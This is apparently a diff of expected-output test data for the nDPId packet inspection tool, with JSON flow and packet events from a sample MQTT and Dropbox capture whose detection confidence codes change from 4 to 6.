+00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1455907267002,"flow_last_seen":1455907267007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1455907267007,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455907271481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1455907271481,"pkt":"CAAnmO\/hCAAnAERyCABFAAB8EMQAAIARN\/bAqDgBwKg4ZcSHRFwAaLRJQwM1AW9STXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMSBFRVQgMjAxNiJ9"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271481,"flow_last_seen":1455907271481,"flow_idle_time":200000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1455907271481,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAB+1KdAAEAGdBvAqDhlwKg4AURd0RSW3pIhxZi6gFAYAOXyJwAAMlQACEJ1czE3Q21kAAJ7Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907271483,"flow_last_seen":1455907271483,"flow_idle_time":7580000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1455907271483,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455907271483,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":61,"pkt_l4_len":27,"thread_ts_msec":1455907271483,"pkt":"CAAnAERyCAAnmO\/hCABFAAAvXYVAAEAR64HAqDhlwKg4AURcxIcAG\/HjY0Q1AW9STYsvci9CdXMxN0NtZA=="} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455907271485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1455907271485,"pkt":"CAAnmO\/hCAAnAERyCABFAAAsEMdAAIAG+E3AqDgBwKg4ZdEURF3FmLqAlt6Sd1AYAP++LAAAQAIAAgAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1455907271522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1455907271522,"pkt":"CAAnAERyCAAnmO\/hCABFAAAo1KhAAEAGdHDAqDhlwKg4AURd0RSW3pJ3xZi6hFAQAOXx0QAA"} 00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1455907271585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907271585,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EM0AAIARN+7AqDgBwKg4ZcSHRFwAZzJrQgM1Anj4ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjExIEVFVCAyMDE2In0="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455907272856,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1455907272856,"pkt":"CAAnmO\/hCAAnAERyCABFAAB7EWkAAIARN1LAqDgBwKg4ZcSORFwAZ7scQgMdqQeYckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjEyIEVFVCAyMDE2In0="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907272856,"flow_last_seen":1455907272856,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1455907272856,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1455907272858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1455907272858,"pkt":"CAAnAERyCAAnmO\/hCABFAAAuXhFAAEAR6vbAqDhlwKg4AURcxI4AGvHiYkQdqQeYiy9yL0J1czE3Q21k"} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1455907272969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907272969,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/EYMAAIARNzTAqDgBwKg4ZcSORFwAa8WlRgMdqhF5z0YYRXJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxMyBFRVQgMjAxNiJ9"} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1455907274088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":139,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":139,"pkt_l4_len":105,"thread_ts_msec":1455907274088,"pkt":"CAAnmO\/hCAAnAERyCABFAAB9EncAAIARNkLAqDgBwKg4ZcSIRFwAaR7GRANSj9XGl0FyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTQgRUVUIDIwMTYifQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1032,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907274088,"flow_last_seen":1455907274088,"flow_idle_time":200000,"flow_min_l4_payload_len":97,"flow_max_l4_payload_len":97,"flow_tot_l4_payload_len":97,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1455907274088,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1455907274089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1455907274089,"pkt":"CAAnAERyCAAnmO\/hCABFAAAwXqNAAEAR6mLAqDhlwKg4AURcxIgAHPHkZERSj9XGl0GLL3IvQnVzMTdDbWQ="} 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1455907274193,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1455907274193,"pkt":"CAAnmO\/hCAAnAERyCABFAACBEpIAAIARNiPAqDgBwKg4ZcSIRFwAbeMnSANSkLugNTWCkTE2ckRcQXIIQnVzMTdDbWQRMv97Im1lc3NhZ2VUeXBlIjoiVVBEQVRFIiwibWVzc2FnZUNvbnRlbnQiOiJGcmkgRmViIDE5IDIwOjQxOjE0IEVFVCAyMDE2In0="} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1455907275690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1455907275690,"pkt":"CAAnmO\/hCAAnAERyCABFAAB\/FCAAAIARNJfAqDgBwKg4ZcSPRFwAa2JLRgOAZtDWwMpn\/nJEXEFyCEJ1czE3Q21kETL\/eyJtZXNzYWdlVHlwZSI6IlVQREFURSIsIm1lc3NhZ2VDb250ZW50IjoiRnJpIEZlYiAxOSAyMDo0MToxNSBFRVQgMjAxNiJ9"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1927,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907275690,"flow_last_seen":1455907275690,"flow_idle_time":200000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":99,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1455907275690,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1455907275695,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1455907275695,"pkt":"CAAnAERyCAAnmO\/hCABFAAAyX35AAEAR6YXAqDhlwKg4AURcxI8AHvHmZkSAZtDWwMpn\/osvci9CdXMxN0NtZA=="} 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2015,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1455907275831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1455907275831,"pkt":"CAAnmO\/hCAAnAERyCABFAACAFEwAAIARNGrAqDgBwKg4ZcSPRFwAbLkURwOAZ6ExGoh1VzNyRFxBcghCdXMxN0NtZBEy\/3sibWVzc2FnZVR5cGUiOiJVUERBVEUiLCJtZXNzYWdlQ29udGVudCI6IkZyaSBGZWIgMTkgMjA6NDE6MTUgRUVUIDIwMTYifQ=="} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 